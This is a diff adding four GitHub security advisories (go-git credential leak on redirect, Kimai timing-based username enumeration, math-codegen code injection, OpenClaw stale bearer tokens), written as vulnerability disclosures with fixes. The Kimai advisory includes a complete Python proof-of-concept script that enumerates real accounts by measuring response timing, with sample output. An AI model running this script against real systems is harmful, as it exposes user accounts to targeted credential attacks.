Publish Advisories

GHSA-3xc5-wrhm-f963
GHSA-jrc6-fmhw-fpq2
GHSA-p6x5-p4xf-cc4r
GHSA-xmxx-7p24-h892

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-3xc5-wrhm-f963/GHSA-3xc5-wrhm-f963.json

@@ -0,0 +1,80 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3xc5-wrhm-f963",
+  "modified": "2026-04-17T22:31:35Z",
+  "published": "2026-04-17T22:31:35Z",
+  "aliases": [],
+  "summary": "go-git: Credential leak via cross-host redirect in smart HTTP transport",
+  "details": "### Impact\n`go-git` may leak HTTP authentication credentials when following redirects during smart-HTTP clone and fetch operations.\n\nIf a remote repository responds to the initial `/info/refs` request with a redirect to a different host, go-git updates the session endpoint to the redirected location and reuses the original authentication for subsequent requests. This can result in the credentials (e.g. Authorization headers) being sent to an unintended host.\n\nAn attacker controlling or influencing the redirect target can capture these credentials and potentially reuse them to access the victim’s repositories or other resources, depending on the scope of the credential.\n\n**Clients using `go-git` exclusively with trusted remotes (for example, GitHub or GitLab), and over a secure HTTPS connection, are not affected by this issue.** The risk arises when interacting with untrusted or misconfigured Git servers, or when using unsecured HTTP connections, which is not recommended. Such configurations also expose clients to a broader class of security risks beyond this issue, including credential interception and tampering of repository data.\n\n### Patches\nUsers should upgrade to `v5.18.0`, or `v6.0.0-alpha.2`, in order to mitigate this vulnerability. Versions prior to v5 are likely to be affected, users are recommended to upgrade to a supported `go-git` version.\n\nThe patched versions add support for configuring [followRedirects](https://git-scm.com/docs/git-config#Documentation/git-config.txt-httpfollowRedirects). In line with upstream behaviour, the default is now `initial`, while users can opt into `FollowRedirects` or `NoFollowRedirects` programmatically.\n\n### Credit\nThanks to the 3 separate reports from @celinke97, @N0zoM1z0 and @AyushParkara. Thanks for finding and reporting this issue privately to the `go-git` project. :bow:",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/go-git/go-git/v5"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.18.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.17.2"
+      }
+    },
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/go-git/go-git/v6"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "6.0.0-alpha.2"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 6.0.0-alpha.1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/go-git/go-git/security/advisories/GHSA-3xc5-wrhm-f963"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/go-git/go-git"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-522"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-17T22:31:35Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-jrc6-fmhw-fpq2/GHSA-jrc6-fmhw-fpq2.json

@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-jrc6-fmhw-fpq2",
+  "modified": "2026-04-17T22:30:59Z",
+  "published": "2026-04-17T22:30:59Z",
+  "aliases": [],
+  "summary": "Kimai: Username enumeration via timing on X-AUTH-USER",
+  "details": "## Details\n\n`src/API/Authentication/TokenAuthenticator.php` calls `loadUserByIdentifier()` first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases (`{\"message\":\"Invalid credentials\"}`, HTTP 403), so the leak is purely timing.\n\nThe `/api/*` firewall has no `login_throttling` configured, so the probe is unbounded.\n\nThe legacy `X-AUTH-USER` / `X-AUTH-TOKEN` headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required.\n\n## Proof of concept\n\n```python\n#!/usr/bin/env python3\n\"\"\"Kimai username enumeration via X-AUTH-USER timing oracle.\"\"\"\n\nimport argparse\nimport ssl\nimport statistics\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\n\nPROBE_PATH = \"/api/users/me\"\nBASELINE_USER = \"baseline_no_such_user_zzz\"\nDUMMY_TOKEN = \"x\" * 32\n\n\ndef probe(url, user, ctx):\n    req = urllib.request.Request(\n        url + PROBE_PATH,\n        headers={\"X-AUTH-USER\": user, \"X-AUTH-TOKEN\": DUMMY_TOKEN},\n    )\n    t0 = time.perf_counter()\n    try:\n        urllib.request.urlopen(req, context=ctx, timeout=10).read()\n    except urllib.error.HTTPError as e:\n        e.read()\n    return (time.perf_counter() - t0) * 1000.0\n\n\ndef median_ms(url, user, samples, ctx):\n    return statistics.median(probe(url, user, ctx) for _ in range(samples))\n\n\ndef load_candidates(path):\n    with open(path) as f:\n        return [ln.strip() for ln in f if ln.strip() and not ln.startswith(\"#\")]\n\n\ndef main():\n    ap = argparse.ArgumentParser(description=__doc__.strip())\n    ap.add_argument(\"-u\", \"--url\", required=True,\n                    help=\"base URL, e.g. https://kimai.example\")\n    ap.add_argument(\"-l\", \"--list\", required=True, metavar=\"FILE\",\n                    help=\"one candidate username per line\")\n    ap.add_argument(\"-t\", \"--threshold\", type=float, default=15.0, metavar=\"MS\",\n                    help=\"median delta over baseline that flags a real user\")\n    ap.add_argument(\"-n\", \"--samples\", type=int, default=15)\n    ap.add_argument(\"--verify-tls\", action=\"store_true\")\n    args = ap.parse_args()\n\n    url = args.url.rstrip(\"/\")\n    ctx = None if args.verify_tls else ssl._create_unverified_context()\n    candidates = load_candidates(args.list)\n\n    baseline = median_ms(url, BASELINE_USER, args.samples, ctx)\n    print(f\"baseline: {baseline:.1f} ms\", file=sys.stderr)\n\n    width = max(len(u) for u in candidates)\n    print(f\"{'username':<{width}}  {'median':>8}  {'delta':>8}  verdict\")\n    print(\"-\" * (width + 30))\n    for user in candidates:\n        m = median_ms(url, user, args.samples, ctx)\n        delta = m - baseline\n        verdict = \"REAL\" if delta > args.threshold else \"-\"\n        print(f\"{user:<{width}}  {m:>6.1f}ms  {delta:>+6.1f}ms  {verdict}\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\nUsage:\n\n```\n$ ./timing_oracle.py -u https://target -l users.txt -n 15\n[*] calibrating baseline with 15 samples\n[*] baseline median: 37.7 ms\n[*] probing 13 candidates (n=15, threshold=15.0 ms)\n\nusername                        median     delta  verdict\n----------------------------------------------------------\nuser1@example.com               64.2ms   +26.5ms  REAL\nuser2@example.com               72.4ms   +34.7ms  REAL\nuser3@example.com               70.0ms   +32.3ms  REAL\ntester.nonexistent@example.com  37.2ms    -0.5ms  -\nadmin                           63.6ms   +25.9ms  REAL\nadministrator                   38.2ms    +0.4ms  -\nroot                            37.3ms    -0.4ms  -\ntest                            33.6ms    -4.1ms  -\ndemo                            38.2ms    +0.5ms  -\nkimai                           37.0ms    -0.7ms  -\nnonexistent_user_aaa            38.1ms    +0.4ms  -\nnonexistent_user_bbb            37.5ms    -0.2ms  -\nnonexistent_user_ccc            38.4ms    +0.7ms  -\n```\n\nIn this run, four real accounts were identified out of thirteen candidates with no false positives or false negatives. Probing took roughly five seconds per username at fifteen samples each.\n\n## Fix\n\nIn `TokenAuthenticator::authenticate()`, run the password hasher against a fixed dummy hash when the user is not found, so the response time does not depend on user existence:\n\n```php\nprivate const DUMMY_HASH = '$argon2id$v=19$m=65536,t=4,p=1$ZHVtbXlzYWx0ZHVtbXk$YQ4N4lU0Sg9hRT2KhRGwLp7y4VZqkM5KQ8wYJ5HtoX0';\n\ntry {\n    $user = $this->userProvider->loadUserByIdentifier($credentials['username']);\n} catch (UserNotFoundException $e) {\n    $this->passwordHasherFactory\n        ->getPasswordHasher(User::class)\n        ->verify(self::DUMMY_HASH, $credentials['password']);\n    throw $e;\n}\n```\n\nThe dummy hash must use the same algorithm and parameters as real user hashes so that `verify()` consumes equivalent CPU. Generate it once with `password_hash('dummy', PASSWORD_ARGON2ID)` and pin it as a constant.\n\n## Relevance\n\nThe practical security impact is very limited. The response body and HTTP status are identical, and the only observable difference is a relatively small timing gap, which is even less relevant when the requests is executed against a network instead of a local installation. In addition, [this authentication method has already been deprecated since April 2024 and is scheduled for removal after Q2 2026](https://www.kimai.org/en/blog/2026/removing-api-passwords), so the issue only affects a legacy mechanism that is already being phased out. ",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "kimai/kimai"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.54.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.53.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/kimai/kimai/security/advisories/GHSA-jrc6-fmhw-fpq2"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/kimai/kimai"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-208"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-17T22:30:59Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-p6x5-p4xf-cc4r/GHSA-p6x5-p4xf-cc4r.json

@@ -0,0 +1,63 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-p6x5-p4xf-cc4r",
+  "modified": "2026-04-17T22:31:45Z",
+  "published": "2026-04-17T22:31:45Z",
+  "aliases": [],
+  "summary": "Remote Code Execution (RCE) via String Literal Injection into math-codegen",
+  "details": "### Impact\n\nString literal content passed to `cg.parse()` is injected verbatim into a `new Function()` body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into `cg.parse()` is vulnerable to full RCE.\n    \n### Patches\n\nThe vulnerability is addressed by using `JSON.stringify()` on string literal values in `lib/node/ConstantNode.js` to ensure they are treated as data rather than code. Users should upgrade to version 0.4.3 or later.\n    \n### Workarounds\n\nAvoid passing un-sanitized user input to the parser or manually escape string literals in the input.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "math-codegen"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.4.3"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/mauriciopoppe/math-codegen/security/advisories/GHSA-p6x5-p4xf-cc4r"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/mauriciopoppe/math-codegen/pull/11"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/hits3134"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/mauriciopoppe/math-codegen"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-94"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-17T22:31:45Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-xmxx-7p24-h892/GHSA-xmxx-7p24-h892.json

@@ -0,0 +1,63 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-xmxx-7p24-h892",
+  "modified": "2026-04-17T22:32:02Z",
+  "published": "2026-04-17T22:32:02Z",
+  "aliases": [],
+  "summary": "OpenClaw: Gateway HTTP endpoints re-resolve bearer auth after SecretRef rotation",
+  "details": "## Summary\n\nGateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart.\n\n## Impact\n\nA bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value.\n\nVerified in `v2026.4.15`:\n\n- `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot.\n- `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks.\n- `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "openclaw"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2026.4.15"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/pull/66651"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/openclaw/openclaw"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-324"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-17T22:32:02Z",
+    "nvd_published_at": null
+  }
+}